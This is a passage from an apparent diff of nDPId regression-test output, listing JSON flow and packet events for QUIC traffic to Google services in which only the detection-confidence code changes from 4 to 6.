zIvoSpfYLvtOATq8ZeC375hfqRNXtw\/n1kUK3bICXzA6mFxkmQD7AGOSqcR3jSdloiLRo+G\/p15yY7zRCuvYbEtKyY7omcrKB9AP+U0Y\/znYg58r4wOaZBC4V+dmRK\/kkpba47uaqRhUyF\/yTdt5a8rnd6rmCkS\/vkMPoDjgVn9aKrD3m9zX1zDlvbDZWh6g6iUswysusJDPEcMqVt9oBikmJmTA4XJHL7KebwbAwBNS3e6+CgYETncO9oV627jebHXfk1gOzNt336lADXC3SIjRhE0xUCj9b7vGl2zV\/XiVaHp4BdieNUYdFnptfsJwounQcX5RSNrDM7WkoXytf9j\/GcyxSIH55p+0ANjoTPQ14vhNgMa5CNLbJsAFOaOAZLOmrRttaEW+CIy\/6QEDgSPdDqCmjHaTsDMAS0PJ+CViTPaRKX9Mb\/HoG1+hLb7WLn885xXvuCUz6bu45JBXtjOSd2sFZtZL5SSAAkPqTlNn4yof7j6smtUT03YKs+rhKLROxwhgN\/v7YhG5RqBATOJnmQaGvuGYn8hIWfZ0uuo2mUCeo5E23kwQk4p+DKVCBDeHuSFjGPVCnKBGHNbnoLJC5+6z0UTOz+H8VNr5FqbVxdiFV1rCMp6QITKc\/"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621492846202,"flow_last_seen":1621492848301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494601272,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621492846202,"flow_last_seen":1621492848301,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621494601272,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"196.245.61.64","src_port":52512,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":111,"packets-processed":110,"total-skipped-flows":0,"total-l4-payload-len":148500,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":71,"total-idle-flows":70,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":328,"global_ts_msec":1621495208068} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1621495208068,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495208068,"pkt":"AAAAAAAAAAEA4PSECABFAAViwetAAH4RV8iokEAFXWSX3eVPAbsFTgNDy\/8AAB0IwxBIsrHTx3QAAEU0bjduGiBH9YcAvIt1wprzZRiYJMPzF1MMPECwlUSWc\/RBbV+iPDb\/v0+UPTqOqIz1XEDYAo7pbau308le6Th0FZqRlv4SU+qXh+iRpNvtIutuNBwNhb6WnLZjvRY70vVsUgD0scdNaDgMj3pPrZ0V8bA\/xmESw7VNToLPcOadkH9MHbF41jMAPEaD3xqUkat1\/m5M4Pv0eZtU0YzflDUjEcIUViabEpyfwesJgnqwj9BXqmfBSQXLW6uS7UCVUFH+dCmqa\/iJJ4SrwnAYJlCIN9NwJ+1Ze32XUdoN4V9vQ5GScujeLsdwY+HlSYWOZd9d2+\/d597gVGXqOsrTKKKVZCRdEs9QySjbJmNdJ4wcHvezwRkLYorieHie4sHilr6O5PVEqCfP8aHxH6msP3pHsklsYop606JbaZfCUfDG3w9nrXiNdmjL4dJ0aBKky9\/MhuPCuq4g15oIigu1FWbGfnmKl3BVJ5ryEDgMgOYehMyIJ+weIqtrAsvJaI2654d2yQ2OH9clUvxOeU\/jKLdsEL55j4Tpx9kOP9X\/3VWUCYt8YZ5rPGJN919ko9rZSBS1iM\/mjZCh7R6C1BomS2uqQqN\/2PwrKORuR7kRPmRkEsFpLoC4sATPr\/GTOP4nq63u7VF4sRJLtFi0qkGLBgbQiSIJZtFdtEjfxSrL6lqAnUrfYHAOISDQ1zIN1STDOnYrZ+Szd6N0NTZjKTFuAILRTK6wWG7zCeHuTNeZX8\/oHFYs7C7zyiGROiQkB8jkJD03SKBESsIOyuKO34yRQ7G+tB9M+WUrPUQDrOaQYjktHLjExIf+tn3Q0v0e\/rX\/xZZ3jNOD8Qo4cgJe9IBtNjEwXGPmZe0mVY\/ufgxNE1QutAq0xthgcM+KYUEAzsSQrzZK7ZOiLzHOqVPgXabqgy2oQWta7AlIrCSdCUHqqZ2Br7i1\/EFecVKIWlJ6vPFrZrOW1amQ6rV5WG6x9ovznlQWmBXygRZ6Zl6H11NDYyBm3Xb8pfynprut37QWSPCciwK7rtbnKe+EUnnE3Lnwb5XQzYSEfhojjMsjXsuZk2\/ovtBV2Jkl90MUUjDk4XeHIhe5n2t7qmj8rxsQKuxj9rBjDRjH+OIEZKEgLrFx5GoAGcYxzb3iHJF3TqdzTXu+qBokr4C959Ki309NAHaXzDaotCBtbPJMmwo9pqOst5Z\/tUfAwxDkswPSvCJzhA9mKCrSpl9Hf7PMyNrHdZTvaZMSASEy5\/sXqR7D3JPQ0B6dM9WwJIOoJ9KhPZ04lCOFJrW856gP8dZwzXWKZ5I\/qcrmankwbLnu1BKyarOpUL01fzxuRuamfUYfUru2TsLlGCUKIoWaMMrIKq4yKC6\/6T\/HJSYLPqY6fqVNsFh7bYwtGviFJVCGEYBPrNIOz4yL3nUg1+uS6Kxs3zX4N67DQOOGoQbq6bHyTlfJI4n01aPlGre0bfmC6Tp3JWM98e2jHYR5XNuWQjoxn\/Z1NA+ZLc3yPpyEnSO4zqV8lVzpFrDpqkbQ9ycyuV\/D1kx\/32e3Zc0t0r1GFlvu5HnAklFEwANPKBU7ocnXr4EBpq1xKM1aTAWc1RcVfilSm1xz82LQyCCJOc5iO\/zmin3ZpftGXkTCNVvQW1LtwAAhh0Zlx03rw7AC\/J1p0cID8UBIj7r9QeymlFafS9\/16+RcZYgdL3KUrKdHSbSrCPKTng4X0j\/abdtQxrxTSZYjKGQPl+WBVoLmCgqLLkuJIJhEXfQiPfgtO1fDtgu+l2TZCwO8OKgySKJH5cW\/"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495208068,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1621495210744,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495210744,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFXpAAH4RYIKokEAFgPgYAdcaAbsFTt\/iyv8AAB0I2zeQoOz5WyUAAEU0jhtk7ZYO\/t++QG80XD8xnpwXGKbf+FVJ+ISOgwLVL45kqQP6tSuWth5HXdoJc8ZyI19g5++SRrnWaPSJCxPjE9g315E4TbKU9m\/we74ovYlIndf6LYLJ0WqrP6o8IkyXDszg8SzZSMt4M30t4SgDRR6Q5o2IbPGolAh7UamAr90QEylR\/uIS0sasMvvkSpysRp9ckggnCAbstJcHBvinhjkG2VSPzmjNJoDsOtvPqHPtJvNpojktPxYWHTjpWdYUAod79DMkXY1vRqntsgNNDYXeZhdoXwH2HWV\/exDKz+F9bcgQNX6hnXanzIbxcQxbT7yuzcXLZMUP0rJvP9NrvYnLotM2YIP1NkqQ4MUgi\/LE+5\/YOOGegvWSeBErSprROif2Slau6EpF9Rq4x9QyI9geY7GPFow13L3eizcByac8aehgQKHihAWI+Aqo4T9GXf2lmgEXe5yhso68TiNdxt41vH2DonLNC7Tc9M7Yorh3IwY5xUSGl\/cKy8\/pNoo+tpLVj71oehQFnGVEF+ybMdivZd+7KU8tyx6ITEtXyiw3M6HXXtpk3dR6MsHhhasZ7jAjpsXi+vLpD6vyr7XXniVlK3Lr9tM5wlg\/jvTaI4NkA218LBhKKGxwAGv8oCPrc25uEEjEejA5BPJgFu\/CiYBkhUaI\/kKl+nzfCcirOfwodGDc0COV09EassJlEJui5t3XnNV6EBm1lbnXwDWWeI0ApwOcHPJltBOadayMvcNnaSTKZUXlUZMHRVbucS36AeTVGz2gPUzmorPO2uaLQlFHbWbB1zjXeyc\/sJ9mtAMr9ZhShgV0cowmNG2pc9FJh6Zn2x0Xdbc0IwQyY\/6a4THfFzmMy8Jtca5vfwAC0913Z93ITxHg81JUp2VflW10aNBAK\/3ZclhXoSqIkiv185lAI98fihhaKIrmzK7Fy6nPKOaw7vIegqSSG6ZapEOg4SzV+xRYAgVte+oL1b6sJHDlbzRsP5zepWbsm85VJ63ZrUR3u8MAlt62wM0wL9097D97l3SQ+cYuK9W7nyjYx\/9BD+SJW0v+X4XA4vtGpyhFY1DOIH63kMLcMhe5aDv7B4XYQtlwZaWWnHrImv3mrYyGAL+lEluvRLRX9rEY5R\/mNiI2y6wWHzjt9pDJSkSYvJlR0qHzUue0vQ47hV0cK3JJqNngTXscTgX9aYnkYr8r4MNj9MakUpjEbwITu2IBh382EjALjSzLNo2XcWehzOYL27v3D7d7PDtp0rnG4OUFoW+IyHj1keIWK86WJtFdeBDMshTrkFdQohEGsthgjzPLWNJmhJL8ga45Ja1nwcOo2JogHVMcm8q8wtFTZXshq8+LkDrjmtHkC+WoUNWaOeSKZ7j\/oemgVwqEl2l7mvAzOxEJr1J3TfhfKU1NpXw7rDWKDBvJTfPruGKdPzB3Gxe\/my6eLPCswoooJpfxjAeoA1wH29XDgAt3X+b1xk+iODC\/DDY95uzF1zP+yDMe\/+Jl96QUOQQu+OtftKDxI85nxzLNHxoZjwWaFyJc1wCIfTz7dFAlvTf4s7vP5d2w81Q2oT0WBCvyq7u\/FZL7sO3QU\/WJNEl\/cHjLi9alY6m3pmUEjfwLy\/F1tNlRzfnY4\/lLHjdHuE173k72dusgFghWwAhzZ6MyVF4vHBG7y6pAA0Aeb2SJB\/LM7yndloeF5OJdKc8z0xx74TFrQsJXZitMjB7tfvygzYT0lT0+ydw\/XW3s+g3kR+JzDjS\/1mehf\/csJdmyGhkB5thAT1Mu4dteApqj"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495210744,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1621495211515,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495211515,"pkt":"AAAAAAAAAAEAS1QMCABFAAViGaxAAH4RgN6okEAFQSEzSvG+AbsFTsazy\/8AAB0Igb5NFJ6PF1oAAEU0xCAwnLtbjGUk+fejVmQozQOg0\/ESmN2FG+LOLPBns4theX05eIqUs4AHp7MrmdBMpaQWbc++dLtAQvCTs26HRJJN3DNALzirEZEWeKXTpfa8Ts+3tIY1yxvgw0lrCnC6WI4RVm+nJiWVtstu+BEaotx33QRtR1Kn9gDj9C+jgzsJvfbt+\/T4njpF9igVWsDeg57RA8NGboKJBBGDNLF0BQAAStKBXmKkpSZb\/Ai8RWN1Wct3KRq4r+qQ3P3+\/sCREOyEForD1qoAlfL9ibjQ5mOCpDDMysyN6vJIZBLAIDyvg4ilAKvWZ4QDSMJ9OgKY0ajtVjTL3fziHI53PUsTfoKz2LhwyKEfX8BmjBWA0jXT+sxB1lLAO4+3hy6jMxtGkeNNuhNuHvXbZMw7KZQweD2KxBTPSRJj9h4XOpS9jecr39\/eI6Ufn0VUWTti96mlVggW1ELQ9Gzv0mt6Sj\/iXWWlhaBrl\/5KcWrRXkoydLMLw9Vzz87jbLyNeVZLuWpfVSUh7CI0Rg1OwuBa6nYtOTUcERnuMjACBglx\/HzzMAhlNNo1t5mNQXmjiSnKPJhZCnk3p2LZGXu87vxRMlxSffV4SqrXO7wDQkUSYxXb7oZWdtThtgLUTVT2enl18CO7EnZE\/hMsDrKUng1wrmlJiEAKhVx84skul7zziN\/swLfTsLc4L\/Rh56+ksEb5ZOBD9pay5QOHbuHrJRo8m4CZVNnj3Dgx3xr+3JuKUvg+kOM3m7RI3Po4kt\/n8LAUml+mMQfl4NvAr6ubkDP1xqfcw0TJPkD7yMj6pyeGUDLzkvCt1A0lzBCbBAB7LgMBDnqF3+TKn8wjqWaCXD9\/MfwpZrUigX6+BgfBJhekq66OqMCnJ+VHQc6YXwl4WRujuUw5VdXOpzTw0OxPy9jF30qmvc6CFrRXOsheI7s1ZpaGAgRg4XoM2GPa0j8SFSUdAeiDxEG8GLGwk9cj7WlLuHBSvlmgsNsYJ\/GryTsJnP+UFmNZdhzB35TcvHB92LSpb98htP1t+0qfXuWWt\/XxIGWQ05O2i+qMOSQAGice3HQtfoGUecR1tnZtD3M+AG82g+yrfUCtloJRNeKF4i+NLICfC15RBLdQmyBHI4Jp0PrgoY29jnIk\/NXK\/K69zMHG9dwfAuGYGjV5+7S3O8LN0VKHpZX2MPzHvBSVAEeLIIrFvxPd5WAk\/NlP+VCgZeDw2WLWwSoBMKn3Hb45mqCzrz\/ewbbbIqKa5xT0fE07dK1+T6w4nEhZjWHuJ+RgLpytAUeLaUhAF16fa9AfEFIgjKGqBWJ9N5FXIQ5vG3\/jF6jSbeNlArJDPsDpC\/S4qXX3v6NM9AxXeUI+b6sLh2qGEkgH5rpD+sQDjPQTrbQ9qeHP9ScuuqxyVEFwBWkAsuBI47Z78qebLTD5Go0mPgMzirhwrkhtfLutVWtNkaHwAf+JYotY4qEhDzPGiadbe1HrDoGvbocggh3pxX51uqeJMe9WOH1FUYy5Gu\/xsfRfOCfcg2F\/V51slWJp5X\/9o4XM6Bw0YcrHBxfj9HNFN648ftB8pJP71vfUXO0grtae2iZgpV2t8zUeIX9GgkZlNUlWEMf9\/3BjG091t76vGyBugi9d89TV0NhohcgwJ+qcoqlNXcuHjhk\/fOqUS3wjE+1eYp5M6IexXwbRv3Nz+DIlCZvJzr4JVfLqNZ7hMWmHMe1dmGGZmJYxst5jAT7KaRnygYqCur4qVoS5QZ1HM+7v4L06XXJCVSvXpuEzfgoozex+hKNh2ucO"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1621495211714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495211714,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFYZAAH4RYHaokEAFgPgYAf9vAbsFTmBDy\/8AAB0IOJJ3hsacNv4AAEU0baY3xqzzCvPxyArXzKLDKouHC7RJHh3pTwE\/T+gSQ10GMfO+dVkOJKeQmaLmpDDYpWDl93SoFgzgGj9JyJNxMfBbB3KINp6o8wpksTBkLOXzlV1A9kaeJmvRuK9RfLEFAe9vWScl9hjEsPcf\/QHzr36kD0umOekJmoKT6EqNBn5HwV2qpv87uu9skIz297knDD7vXWjxtwVhWb2tUz96K+btC4+kYJ\/VTNFpLAAIcX3fAe2CLqMf5rdoAycaNQOrLtyNhjw8JnO7NaOOS2\/V7TAr3iqoiWd7r9g+yYn6wAauOjYdWUM3sLAzE8JEijyJO4SAWMXK5LL45C8m56doUnVsNdTCfisF3ey+SwnsCSNggQyi7Ouznig0OBO44rroi3XNqvU4LOwiK\/7gydyfJ7z8wQ\/CI7gjztoz6kc8GMvLgxoJrOq5QzKGL6SbpCNfU6v5q5B8KSG99Sw7MC0kFWTOVIriQx89bvz3x8+ENfpFjHGCeDGEJs26uPwMaNh7ZXQJu1bIpbynvx5JRciSvltkVonCWFzNIp85z5bLW0qXOR0D8EYnkuSjvrZjqrNGNBMZrsHxs1dhO9sGDPIJZPKKGbiC1LxvCMo8xLyF2KZ4PDuHQao+nhqvmJJ0FnbteaTR2scFeXrZiaEGdUThIbCZ7xFmpi7zJM6Ez+sDozO+l3U\/nDTzpPqb+YFL\/0gJU\/AUM69B7j2ezG\/ZIzXQnvmArJVY6m58fYrvGMWNWx5RPDKMXRovwphMGFpUrttX+ttkG+hnB\/imTmkNkUHlqG7g4Q9yRPtSmiXNoEcRe2m8G82yLhBdi9vCclLuBd3LIW1+jXuzc68F1rWZrdVl66iE3UrQLgYnE9WlbCx8vO9E1HF4UpTzPBsFkz\/gOnRuc5WFYHt8O1tUyjv+r05xeK\/ucSaip+2KvZ2Wn1vtwi1odfHkn928POP\/fatifY3iR8WW85F8j4l7UkwInAOtPIz4a6KaKlhTK7GHeMTHER7C1+udBnuKafcdz2PCgJtfWbNxuRucdkkL4mtNfG+hQ\/oCMcBz2poMGIWruxUUwjSwDC3\/Z\/7ipxJOYFn0N8zoMZoCBCBecBVZsLuTJPhNhGB8mSVMMgG2PIsT5NsIOJgovfJrMge08M6CwHrIrU9N5WoiLUvWzJR6vtyL7kEOB70wX6qeabNuf460VB6kIYBN0ZylEP6ZPp4E1RdeoL\/+gOoUe\/V+fKX2QyW1NVSMf+bPC79LkMK0mq2Yhwu5OOnXK1F5\/htvUXqZoAIfhzWAb6naxPrZnP3UqpUf+sMeFX1+B6L98E8Ga9Q1eAsSEPQKRPMDqtSqUKcxSBTRIdpIsSVldrFya70Ko0OKwa4MImURluJnCIMGigCLraP1uJSre+IlkkCQHx+ALZFgGUF0m6nJCLlzQIPva5PhNjC1BFxFj1qqzQq2jmua3tWhbeE7be6k6KK7E9msFfmbvGWCvXmtAa38RMRgtaAp43rM2bZelQ\/hndrt4tse1PjmE31ey8yFJauzvzqjCU95vawcS9zc0SFlOFUMyEq1YWPNDLhqRw2bLrw77gsmS60Do+kYYnbefAdllcPRD5EtBLZ\/rvvE255KhAfhLTFjkdJhuYORsFfaeyqgTFqFjOPcC5F7SZ6rgIV3ZOpPO1FLTknWKAEeYHjfgojr6Fd+FA3kLkSHqNanwaRwB5wf+KtFKdlHSWZ248KX1x+WbTZxOW144N1+mnwBxnyKg8oVlnpGY0NEGjU76RZdNILMXhsMVMGO5Nf2"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": 